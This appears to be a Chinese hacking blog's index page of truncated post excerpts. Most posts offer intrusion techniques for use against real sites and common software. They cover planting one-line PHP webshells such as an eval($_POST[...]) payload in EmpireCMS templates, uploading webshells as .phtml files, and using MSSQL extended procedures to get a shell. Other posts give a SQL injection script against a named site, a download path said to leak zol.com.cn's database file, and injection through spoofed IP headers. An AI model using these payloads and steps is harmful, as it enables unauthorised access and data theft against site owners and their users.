客户端进程(非服务端)设置cookie的几种思路
一般要操作COOKIE有三种方式: 1.客户端浏览器按照协议规定接受服务端的set-cookie头操作cookie。 2.客户端浏览器通过DOM接口操作cookie。 3.直接在客户端构造好浏览器接受的cookie文件。 下面就说下具体实现的思路: 第1种可以在本地proxy或者hook浏览器socket send recv甚至NDIS驱动实现。 第2种比如简单的可以将IE封装独立程序或者BHO的...
php后台插一句话新思路
php后台插一句话的思路加114网址导航后台拿webshell的方法。 首先介绍下php的各种标签: 1): <?php ?> demo: <?php echo "test";?> 这个标签现在程序大多都是使用的这种标签!大家都不陌生了,这里就不多介绍了! 2): <? echo "test"; ?> 这种标签是在以前很普遍的一种用法php 老版本开发的cms大...
apache可上传phtml文件的WEBSHELL
这个是apache默认设置 存在phtml文件 IIS不存在 phtml?对很强大 你可以把php的webshell修改称phtml文件上传,并且可以执行!
中关村在线数据库泄漏!
漏洞不知道是谁现发现的。。。 爆数据库文件:http://www.zol.com.cn/global.asa <SCRIPT LANGUAGE=VBScript RUNAT=Server> 'You can add special event handlers in this file that will get run automatically when 'special Acti...
窝窝团SQL注入漏洞
注册页面 校验email和用户名的地方使用了Ajax POST 数据到服务器端检测,但是过滤仅在客户端进行。使用脚本或者浏览器工具可以轻松绕过。 以下为测试代码(python): import httplib, urllib import sys if len(sys.argv) < 2: exit(0) headers = { “Accept”: “*/*”, ...
(老文章)最棒的10款MySQL管理工具
绝大多数的关系数据库都明显不同于MS Access,它们都有两个截然不同的部分:后端作为数据仓库,前端作为用于数据组件通信的用户界面。这种设计非常巧妙,它并行处理两层编程模型,将数据层从用户界面中分离出来,同时运行数据库软件制造商专注于它们的产品强项:数据存储和管理。它同时为第三方创建大量的应用程序提供了便利,使各种数据库间的交互性更强。这类产品包括Embarcadero Rapid SQL和Or...
3个MSSQL扩展,可用来获取WEBSHELL
EXEC [master].[dbo].[xp_makecab] 'c:\test.rar','default',1,'d:\cmd.asp' 打包 EXEC [master].[dbo].[xp_unpackcab] 'C:\test.rar','c:',1, 'n.asp' 解包,可以用于得到webshell EXEC [master].[dbo].[xp_readerrorlog] 1,'d...
EmpireCMS(帝国)后台拿shell
管理模板 添加自定义页面 <\?php eval($_POST[baidu])?\> <%这个被过滤了所以必须这样写。 作者:killer 还是几个月前一个朋友让我看看帝国进后台能不能找到简单点拿shell的方法,因为他找的方法虽然达到目的了,但是过程很繁琐. 方法很简单,直接上传webshell.. 进入后台---系统设置---管理数据表---管理系统模型---导入新型模块,直...
阿d asp目录扫描脚本
昨天扫描星外发现没有啊D目录脚本。。。现在上传上来! 结合https://www.webshell.cc/1287.html 就OK了! 上图: 下载地址:阿d-asp目录扫描脚本
不常用的注入–利用IP地址进行注入
以前曾经QQ空间发布过关于IP注入攻击的文章,这种注入其实没什么神秘,只是很多时候被忽略了。 IP伪造有几种途径,一种是通过是修改IP数据包,有兴趣的可以去看看IP数据包的结构,还有一种就是利用修改http头信息来实现IP伪造。涉及到“客户端”IP的通常使用3个环境变量:$_SERVER['HTTP_CLIENT_IP']和$_SERVER['X_FORWARDED_FOR']还有$_SERVE...